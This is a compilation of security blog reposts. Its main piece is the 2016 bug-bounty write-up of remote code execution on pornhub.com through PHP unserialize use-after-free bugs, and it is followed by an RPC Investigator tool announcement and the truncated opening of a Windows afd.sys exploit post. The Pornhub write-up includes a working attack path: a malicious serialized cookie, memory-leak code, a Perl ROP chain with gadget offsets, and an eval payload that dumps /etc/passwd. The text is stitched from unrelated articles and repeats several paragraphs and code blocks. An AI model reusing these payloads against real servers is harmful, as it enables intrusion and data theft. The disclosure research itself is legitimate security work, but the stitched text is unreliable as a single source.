How we broke PHP, hacked Pornhub and earned $20,000

How we broke PHP, hacked Pornhub and earned $20,000

Original text by Ruslan Habalov

It all started by auditing Pornhub, then PHP and ended in breaking both…

tl;dr:

  • We have gained remote code execution on pornhub.com and have earned a $20,000 bug bounty on Hackerone.
  • We have found two use-after-free vulnerabilities in PHP’s garbage collection algorithm.
  • Those vulnerabilities were remotely exploitable over PHP’s unserialize function.
  • We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone).

Credits:

This project was realized by Dario Weißer (@haxonaut), cutz and Ruslan Habalov (@evonide).
Many thanks go out to cutz for co-authoring this article.

Pornhub’s bug bounty program and its relatively high rewards on Hackerone caught our attention. That’s why we have taken the perspective of an advanced attacker with the full intent to get as deep as possible into the system, focusing on one main goal: gaining remote code execution capabilities. Thus, we left no stone unturned and attacked what Pornhub is built upon: PHP.

Bug discovery

After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected for example:

  • http://www.pornhub.com/album_upload/create
  • http://www.pornhub.com/uploading/photo

In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers. Example Request:

Bug discovery

After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected for example:

http://www.pornhub.com/album_upload/create
http://www.pornhub.com/uploading/photo
In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers. Example Request:

This could be further verified by sending a specially crafted array that contained an object:

tags=xyz&title=xyz...&cookie=a:1:{i:0;O:9:"Exception":0:{}}

Response layout:

0=exception 'Exception' in /path/to/a/file.php:1337
 Stack trace:
 #0 /path/to/a/file.php(1337): unserialize('a:1:{i:0;O:9:"E...')
 #1 {main}

This might strike as a harmless information disclosure at first sight, but generally it is known that using user input on unserialize is a bad idea:

Standard exploitation techniques require so called Property-Oriented-Programming (POP) that involve abusing already existing classes with specifically defined “magic methods” in order to trigger unwanted and malicious code paths. Unfortunately, it was difficult for us to gather any information about Pornhub’s used frameworks and PHP objects in general. Multiple classes from common frameworks have been tested — all without success.

Bug description

The core unserializer alone is relatively complex as it involves more than 1200 lines of code in PHP 5.6. Further, many internal PHP classes have their own unserialize methods. By supporting structures like objects, arrays, integers, strings or even references it is no surprise that PHP’s track record shows a tendency for bugs and memory corruption vulnerabilities. Sadly, there were no known vulnerabilities of such type for newer PHP versions like PHP 5.6 or PHP 7, especially because unserialize already got a lot of attention in the past (e.g. phpcodz). Hence, auditing it can be compared to squeezing an already tightly squeezed lemon. Finally, after so much attention and so many security fixes its vulnerability potential should have been drained out and it should be secure, shouldn’t it?

Fuzzing unserialize

To find an answer Dario implemented a fuzzer crafted specifically for fuzzing serialized strings which were passed to unserialize. Running the fuzzer with PHP 7 immediately lead to unexpected behavior. This behavior was not reproducible when tested against Pornhub’s server though. Thus, we assumed a PHP 5 version.

However, running the fuzzer against a newer version of PHP 5 just generated more than 1 TB of logs without any success. Eventually, after putting more and more effort into fuzzing we’ve stumbled upon unexpected behavior again. Several questions had to be answered: is the issue security related? If so can we only exploit it locally or also remotely? To further complicate this situation the fuzzer did generate non-printable data blobs with sizes of more than 200 KB.

Analyzing unexpected behavior

A tremendous amount of time was necessary to analyze potential issues. After all, we could extract a concise proof of concept of a working memory corruption bug — a so called use-after-free vulnerability! Upon further investigation we discovered that the root cause could be found in PHP’s garbage collection algorithm, a component of PHP that is completely unrelated to unserialize. However, the interaction of both components occurred only after unserialize had finished its job. Consequently, it was not well suited for remote exploitation. After further analysis, gaining a deeper understanding for the problem’s root causes and a lot of hard work a similar use-after-free vulnerability was found that seemed to be promising for remote exploitation.

Vulnerability links:

The high sophistication of the found PHP bugs and their discovery made it necessary to write separate articles. You can read more details in Dario’s fuzzing unserialize write-up.

In addition, we have written an article about Breaking PHP’s Garbage Collection and Unserialize.

Exploitation

Even this promising use-after-free vulnerability was considerably difficult to exploit. In particular, it involved multiple exploitation stages.
Since our main goal was to execute arbitrary code we needed to somehow compromise the CPU’s instruction pointer referred to as RIP on x86_64. This usually involves the following obstacles:

  1. The stack and heap (which also include any potential user-input) as well as any other writable segments are flagged non-executable (c.f. Executable space protection).
  2. Even if you are able to control the instruction pointer you need to know what you want to execute i.e. you need to have a valid address of an executable memory segment. For this it is common to call the libc function system which will execute a shell command. In PHP context it is often enough to execute zend_eval_string which usually gets executed e.g. when you write “eval(‘echo 1337;’);” in a PHP script i.e. it allows us to execute arbitrary PHP code without having to transition into other involved libraries.

The first problem can be overcome by using Return-oriented programming (ROP) where you can utilize already existing and executable memory fragments from the binary itself or its libraries. The second problem, however, requires to find the correct address of zend_eval_string. Usually, when a dynamically linked program gets executed the loader will map the process to 0x400000 which is the standard load address on x86_64. In case you somehow already obtained the correct PHP executable (e.g. by finding the exact package that is shipped by the target) you can just locally lookup the offset for any function you wantWe discovered that Pornhub was using a customly compiled version of php5-cgi, therefore making it difficult to determine the exact PHP version as well as getting any information at all about the memory layout of the whole PHP process.

Leaking the PHP binary and required pointers

Exploiting use-after-frees in PHP usually follows the same rules. As soon as you’re able to fill freed memory that later on gets reused as an internal PHP variable — so called zvals — you can generate vectors that allow reading from arbitrary memory as well as triggering code execution.

Preparing the memory disclosure

As previously mentioned we were required to obtain more information about Pornhub’s PHP binary. Therefore, the first step was to abuse the use-after-free to inject a zval that represents a PHP string. The definition of the zval structure looks like the following for PHP 5.6:

"Zend/zend.h"
[...]
struct _zval_struct {
    zvalue_value value;       /* value */
    zend_uint refcount__gc;
    zend_uchar type;          /* active type */
    zend_uchar is_ref__gc;
};

Whereas the zvalue_value field is defined as a union, hence making type juggling (and type confusions) easily possible.

"Zend/zend.h"
[...]
typedef union _zvalue_value {
    long lval;          /* long value */
    double dval;        /* double value */
    struct {
        char *val;
        int len;
    } str;
    HashTable *ht;      /* hash table value */
    zend_object_value obj;
    zend_ast *ast;
} 

A PHP variable of type string is a zval of type 6. Consequently, it treats the union as a structure that contains a char pointer and a length field. So crafting a string zval with an arbitrary starting point and arbitrary length creates a powerful infoleak that gets triggered when Pornhub’s setcookie() reflects the injected zval in the response header.

Finding PHP’s image base

Usually, one can start by leaking the binary, which as stated before, begins at 0x400000. Unfortunately, Pornhub’s server used protection mechanisms like PIE and ASLR which randomize the image base of the process and its shared libraries. This also has become the default as more and more distributions ship packages that enable position independent code.

The next challenge was on: finding the correct loading address of the binary.

The first difficulty was to somehow obtain a single valid address we could start leaking from. Here it was helpful to know some details about PHP’s internal memory management. In particular, once a zval is freed PHP will overwrite its first eight bytes with an address to the previously freed chunk. Hence, a trick to obtain a first valid address is to create an integer zval, free this integer zval and finally use a dangling pointer to this zval to obtain its current value.

Since php-cgi implements multiple workers that simply get forked from a master process, the memory layout never really changes between different requests, as long as you keep sending data of the same size. That’s also why we could send request after request, each time leaking a different portion of memory by letting the fake zval string begin at different addresses. However, obtaining the heap address of a freed chunk is by its own right not enough to get any clues about the executable location. This is due to a lack of any useful information in the surroundings of that chunk.

To get interesting addresses, there is a relatively complicated technique which requires multiple frees and allocations of PHP structures during the unserialization process (c.f. ROP in PHP applications Slide 67). Due to the nature of our bug and to keep the complexity as low as possible we have used our own trick.

By using a serialized string like “i:0;a:0:{}i:0;a:0:{}[…]i:0;a:0:{}” as part of our overall unserialize payload we could force unserialize to create many empty arrays and free them once it terminated. When initializing an array PHP consecutively allocates memory for its zval and hashtable. One default hashtable entry for empty arrays is the uninitialized_bucket symbol. Overall, we were able to obtain a memory fragment that looked similar to the following:

0x7ffff7fc2fe0: 0x0000000000000000 0x0000000000eae040
[...]
0x7ffff7fc3010: 0x00007ffff7fc2b40 0x0000000000000000
0x7ffff7fc3020: 0x0000000100000000 0x0000000000000000
0x7ffff7fc3030: # <--------- This address was leaked in a previous request.
0x7ffff7fc3040: 0x00007ffff7fc2f48 0x0000000000000000
0x7ffff7fc3050: 0x0000000000000000 0x0000000000000000
[...]
0x7ffff7fc30a0: 0x0000000000eae040 0x00000000006d5820
(gdb) x/xg 0x0000000000eae040
0xeae040 <uninitialized_bucket>: 0x0000000000000000

The address 0xeae040 is PHP’s uninitialized_bucket symbol address and directly points into PHP’s BSS segment. You can see that it occurs multiple times in the neighborhood of the lastly freed chunk. As stated before, many empty arrays were freed. Thus, by abusing the circumstance that some hashtable entries remained unchanged in the heap we were able to leak this specific symbol.

Finally, we could apply a page-wise backwards scan starting from the uninitialized_bucket symbol address to find the ELF header:

$start &= 0xfffffffffffff000;
$pages += 0x1000 while leak($start - $pages, 4) !~ /^\x7fELF/;
return $start - $pages;
Leaking interesting PHP binary segments

At this point our situation further complicated things as we were only able to leak 1 KB of data per request (this is due to enforced header size limitations by Pornhub’s web server). A PHP binary can take up to about 30 MB of size. Assuming one request per second the leaking would have taken about 8 hours and 20 minutes to complete. As we were afraid that our exploitation process could get interrupted at any time it was essential to act as fast and as stealthy as possible. This is why we were required to implement some heuristics to guess/filter likely interesting sections in advance. Nevertheless, we could resolve any structure that was referenced in the ELF’s string and symbol table. There are other techniques like ret2dlresolve that allow omitting the whole leaking process, but they weren’t entirely applicable here since they require crafting more data structures and require knowledge about different memory locations.

To get the address of zend_eval_string you’d first have to find the ELF program headers which are at offset 32, then scan forward until you find a program header entry of type 2 (PT_DYNAMIC) to get the ELF’s dynamic section. This section finally contains a reference to the string and symbol table (type 5 and 6) which you can completely dump by using their size fields and grab any function whose virtual address you desire. Alternatively, you can also use the hashtable (DT_HASH) to find functions more quickly, but in this scenario it doesn’t matter much since you can quickly traverse the tables locally anyway. In addition to zend_eval_stringwe were interested in further symbols and the location of our POST variables (because they were supposed to be used as a ROP stack later on).

Leaking the address of our POST data

To get the address of the supplied POST data you can just leak some more pointers by reading from:

(*(*(php_stream_temp_data *)(sapi_globals.request_info.request_body.abstract)).innerstream).readbuf

Traversing this chain looks complicated, but you just need to dereference a few pointers with the correct offset and you’ll quickly find the stdin:// stream which points to the POST data inside the heap.

Preparing the ROP payload

The second part deals with actually taking control over the PHP process and gaining code execution. For this to happen we need to discuss how one can modify the instruction pointer first.

Taking over the instruction pointer

We adjusted our payload to contain a fake object (instead of the previously used string zval) with a pointer to a specially crafted zend_object_handlers table. This table is, in its essence, an array of function pointers whose structure definition can be found in:

"Zend/zend_object_handlers.h"
[...]
struct _zend_object_handlers {
    zend_object_add_ref_t add_ref;
[...]
};

When creating such a faked zend_object_handlers table we can simply setup add_ref however we prefer. The function behind this pointer usually handles the incrementation of the object’s reference counter. Once our created fake object gets passed as a parameter to “setcookie” the following things happen:

#0  _zval_copy_ctor
#1  0x0000000000881d01 in parse_arg_object_to_string
[...]
#5  0x00000000008845ca in zend_parse_parameters (num_args=2, type_spec=0xd24e46 "s|slssbb")
#6  0x0000000000748ad5 in zif_setcookie
[...]
#14 0x000000000093e492 in main

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

"Zend/zend_variables.c"
[...]
ZEND_API void _zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)
{
[...]
        case IS_OBJECT:
            {
                TSRMLS_FETCH();
                Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);
[...]
}

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

"Zend/zend_variables.c"
[...]
ZEND_API void _zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)
{
[...]
        case IS_OBJECT:
            {
                TSRMLS_FETCH();
                Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);
[...]
}

In particular, this will make a call to the provided add_ref function with the address of our object as a parameter (c.f. PHP Internals Book – Copying zvals to see an explanation). The corresponding assembly looks like:

<_zval_copy_ctor_func+288>: mov    0x8(%rdi),%rax
<_zval_copy_ctor_func+292>: callq  *(%rax)

Here, RDI is the first argument to the _zval_copy_ctor_func  function which also is the address of our fake object zval (zvalue in the source code above). As previously seen in the definition of the  _zvalue_valuetypedef, an object contains an element called obj of type zend_object_value which is defined as follows:

"Zend/zend_types.h"
[...]
typedef struct _zend_object_value {
    zend_object_handle handle;
    const zend_object_handlers *handlers;
} zend_object_value;

Thus, 0x8(%rdi) will point to the second entry in  _zend_object_value which corresponds to the address of our first zend_object_handlers entry. As mentioned before, this entry is our custom add_ref function and explains why we have direct control over RAX, too.

To bypass the previously discussed non-executable memory problem we had to obtain further information. In particular, we needed to collect useful gadgets and prepare stack pivoting for our ROP chain since there wasn’t enough control over the stack yet.

Leaking ROP gadgets

Now we could setup the add_ref pointer, or RAX respectively, to take over the instruction pointer. Although this gives you a starting point it doesn’t ensure that all of your provided ROP gadgets are executed because the CPU will pop the next instruction’s address from the current stack once returning from the first gadget. We don’t have any control over this stack, so consequently, it was necessary to pivot the stack into our ROP chain. This is why the next step was to copy RAX into RSP and continue ropping from there. Using a locally compiled version of PHP we scanned for good candidates for stack pivoting gadgets and found that php_stream_bucket_split contained the following piece of code:

<php_stream_bucket_split+381>: push %rax    # <------------
<php_stream_bucket_split+382>: sub $0x31,%al
<php_stream_bucket_split+384>: rcrb $0x41,0x5d(%rbx)
<php_stream_bucket_split+388>: pop %rsp     # <------------
<php_stream_bucket_split+389>: pop %r13
<php_stream_bucket_split+391>: pop %r14
<php_stream_bucket_split+393>: retq

This was used to nicely modify RSP to point to our by POST data provided ROP chain, effectively chaining all provided gadget calls.

According to the x86_64 calling convention the first two parameters of a function are RDI and RSI, so we had to find a pop %rdi and pop %rsi gadget, tooThose are pretty common and thus easily found. However, we still had no idea if those gadgets actually existed on Pornhub’s version of PHP. Therefore, we had to manually verify their presence.

Verifying the presence of the required ROP gadgets

The infoleak vector allowed us to quickly dump the disassembly of php_stream_bucket_split and check if our stack pivoting gadget was available on the remote version. Fortunately, only little corrections of the gadgets’ offsets were necessary. Finally, we implemented some checks to confirm that all addresses were correct:

my $pivot  = leak($php_base + 0x51a71f, 13);
my $poprdi = leak($php_base + 0x2b904e, 2);
my $poprsi = leak($php_base + 0x50ee0c, 2);
 
die '[!] pivot gadget doesnt seem to be right', $/
    unless ($pivot eq "\x50\x2c\x31\xc0\x5b\x5d\x41\x5c\x41\x5d\x41\x5e\xc3");
 
die '[!] poprdi gadget doesnt seem to be right', $/
    unless ($poprdi eq "\x5f\xc3");
 
die '[!] poprsi gadget doesnt seem to be right', $/
    unless ($poprsi eq "\x5e\xc3");
Crafting the ROP stack

The final ROP payload that effectively executed zend_eval_string(code); exit(0); looked like the following snippet:

my $rop = "";
$rop .= pack('Q', $php_base + 0x51a71f);              # pivot rsp
$rop .= pack('Q', 0xdeadbeef);                        # junk
$rop .= pack('Q', $php_base + 0x2b904e);              # pop rdi
$rop .= pack('Q', $post_addr + length($rop) + 8 * 7); # pointing to $php_code
$rop .= pack('Q', $php_base + 0x50ee0c);              # pop rsi
$rop .= pack('Q', 0);                                 # retval_ptr
$rop .= pack('Q', $zend_eval_string);                 # zend_eval_string
$rop .= pack('Q', $php_base + 0x2b904e);              # pop rdi
$rop .= pack('Q', 0);                                 # exit code
$rop .= pack('Q', $exit);                             # exit
$rop .= $php_code . "\x00";

Because the stack pivot contained a pop %r13 and pop %r14 the 0xdeadbeef padding inside the remaining chain was necessary to continue with setting RDI. As the first parameter to zend_eval_string RDI is required to reference the code that is to be executed. This code is located right after the ROP chain. It was also required to keep sending the exact same amount of data between each request so that all calculated offsets stayed correct. This was achieved by setting up different paddings wherever it was necessary.

The next step was to finally trigger code execution by returning back into the PHP interpreter. Actually, other techniques like return2libc are quite applicable as well but create a few other problems that are easier dealt with when staying in PHP context.

Returning into PHP

Being able to execute arbitrary PHP code is an important step, but being able to view its output is equally important, unless one wants to deal with side channels to receive responses. So the remaining tricky part was to somehow display the result on Pornhub’s website.

Clean termination of PHP

Usually php-cgi forwards the generated content back to the web server so that it’s displayed on the website, but wrecking the control flow that badly creates an abnormal termination of PHP so that its result will never reach the HTTP server. To get around this problem we simply told PHP to use direct unbuffered responses that are usually used for HTTP streaming:

my $php_code = 'eval(\'
    header("X-Accel-Buffering: no");
    header("Content-Encoding: none");
    header("Connection: close");
    error_reporting(0);
    echo file_get_contents("/etc/passwd");
    ob_end_flush();
    ob_flush();
    flush();
\');';

This finally allowed us to directly fetch every output the PHP payload generated without having to worry about the cleanup routines that are usually involved when the CGI process sends data to the web server. This further increased the stealthiness factor by minimizing the number of potential errors and crashes.

To summarize, our payload contained a fake object with its add_ref function pointer pointing to our first ROP gadget. The following diagram visualizes this concept:

Together with our ROP stack which was provided over POST data our payload did the following things:

  1. Created our fake object which was later on passed as a parameter to “setcookie”.
  2. This caused a call to the provided add_ref function i.e. it allowed us to gain program counter control.
  3. Our ROP chain then prepared all registers/parameters as discussed.
  4. Next, we were able to execute arbitrary PHP code by making a call to zend_eval_string.
  5. Finally, we caused a clean process termination while also fetching the output from the response body.

Once running the above code we were in and got a nice view of Pornhub’s ‘/etc/passwd’ file. Due to the nature of our attack we would have also been able to execute other commands or actually break out of PHP to run arbitrary syscalls. However, just using PHP was more convenient at this point. Finally, we dumped a few details about the underlying system and immediately wrote and submitted a report to Pornhub over Hackerone.

Timeline

Here is the timeline of the disclosure process:

  • 2016-05-30 Hacked Pornhub and submitted the issue over Hackerone. Hours later Pornhub quickly fixed the issue by removing calls to unserialize
  • 2016-06-14 Received a reward of $20,000
  • 2016-06-16 Submitted issues to bugs.php.net
  • 2016-06-21 Both bugs got fixed in PHP’s security repository
  • 2016-06-27 Received Hackerone IBB reward of $2,000 ($1,000 for each vulnerability)
  • 2016-07-22 Pornhub resolved the issue on Hackerone

Conclusion

We gained remote code execution and would’ve been able to do the following things:

  • Dump the complete database of pornhub.com including all sensitive user information.
  • Track and observe user behavior on the platform.
  • Leak the complete available source code of all sites hosted on the server.
  • Escalate further into the network or root the system.

Of course none of the above things were done and very careful attention was paid to respect the scope and limitations of the bug bounty program.
Further, we were able to find two zero day vulnerabilities in PHP’s garbage collection algorithm. Those vulnerabilities, although being in a very different PHP context, could be reliably and remotely exploited in an unserialize context, too.

It is well-known that using user input on unserialize is a bad idea. In particular, about 10 years have passed since its first weaknesses have become apparent. Unfortunately, even today, many developers seem to believe that unserialize is only dangerous in old PHP versions or when combined with unsafe classes. We sincerely hope to have destroyed this misbelief. Please finally put a nail into unserialize’s coffin so that the following mantra becomes obsolete.

You should never use user input on unserialize. Assuming that using an up-to-date PHP version is enough to protect unserialize in such scenarios is a bad idea. Avoid it or use less complex serialization methods like JSON.

The newest PHP versions contain fixes by now. Hence, you should update your PHP 5 and PHP 7 versions accordingly.

Many thanks to the Pornhub team for:

  • Very polite and competent responses.
  • Actually caring about security (and not just pretending like many other companies do nowadays).
  • Being very generous regarding the bounty of $20,000.
    According to Sinthetic Labs’s Public Hackerone Reports last update we are grateful to see that this submission seems to be heads on with the ShellShock vulnerability submission for being one of the highest paid public bounties on Hackerone so far.

Further, many thanks go out to the PHP developers for quickly deploying the fix and the Internet Bug Bounty committee for awarding us with $2,000.

Finally, we want to highlight the necessity of such programs. As you can see, offering high bug bounties can motivate security researchers to find bugs in underlying software. This positively impacts other sites and unrelated services as well.

Please don’t forget to checkout our two other write-ups regarding the PHP bugs and their discovery.

Introducing RPC Investigator

Introducing RPC Investigator

Original text by Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the renowned attack surface its implementers afford to exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there’s always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on Github.

Background

Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

A few years ago, the developer of the open source .NET library NtApiDotNet, James Foreshaw, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post—focusing on using the new 

NtApiDotNet
 functionality via powershell scripts and cmdlets in his 
NtObjectManager
 package—he included a small section on how to use the powershell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the 

NtApiDotNet
 platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integration of symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from 
    NtApiDotNet
    , we can build a more complete picture of ongoing RPC activity.

Features

Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking 

Edit -&gt; Settings
. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, you can specify the path 
srv*c:\symbols*https://msdl.microsoft.com/download/symbols
).

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user’s application data folder, which is typically 

C:\Users\(user)\AppData\Roaming\RpcInvestigator
. To view this folder, simply navigate to 
View -&gt; Logs
. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (which is most likely none).

Searching for RPC servers

The first thing you’ll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the 

File -> All RPC ALPC Servers…
 menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC) by parsing the server’s image by selecting 

File -&gt; Load from binary…
 and locating the image on disk, or by selecting 
File-&gt;Load from service…
 and selecting the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item 

Library -> Servers
 to view all discovered RPC servers and 
Library -> Procedures
 to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for “()” to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to 

Library -&gt; Refresh
, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded and I suspect Microsoft’s public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly-discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item 

Library -&gt; Erase
 or manually delete the database file (
rpcserver.db
) inside the current user’s roaming application data folder. Note that RPC servers that are discovered by using the 
File -&gt; Load from binary…
 and 
File -&gt; Load from service…
 menu items are automatically added to the library.

You can also export the entire library as text by selecting 

Library -&gt; Export as Text
.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library servers or procedures tab and select 

New Client
.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by 

NtApiDotNet
. The code has been modified to include a “Run” function, which is the “entry point” for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets and an application can consume those events to diagnose performance issues.

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to 

Tools -&gt; RPC Sniffer…
 and click the “play” button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select 
    Open in library
     or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

Original text by By Valentina Palmiotti co-authored by Ruben Boonen

‘Patch Tuesday, Exploit Wednesday’ is an old hacker adage that refers to the weaponization of vulnerabilities the day after monthly security patches become publicly available. As security improves and exploit mitigations become more sophisticated, the amount of research and development required to craft a weaponized exploit has increased. This is especially relevant for memory corruption vulnerabilities.

However, with the addition of new features (and memory-unsafe C code) in the Windows 11 kernel, ripe new attack surfaces can be introduced. By honing in on this newly introduced code, we demonstrate that vulnerabilities that can be trivially weaponized still occur frequently. In this blog post, we analyze and exploit a vulnerability in the Windows Ancillary Function Driver for Winsock, 

afd.sys
, for Local Privilege Escalation (LPE) on Windows 11. Though neither of us had any previous experience with this kernel module, we were able to diagnose, reproduce, and weaponize the vulnerability in about a day. You can find the exploit code here.

Patch Diff and Root Cause Analysis

Based on the details of CVE-2023-21768 published by the Microsoft Security Response Center (MSRC), the vulnerability exists within the Ancillary Function Driver (AFD), whose binary filename is 

afd.sys
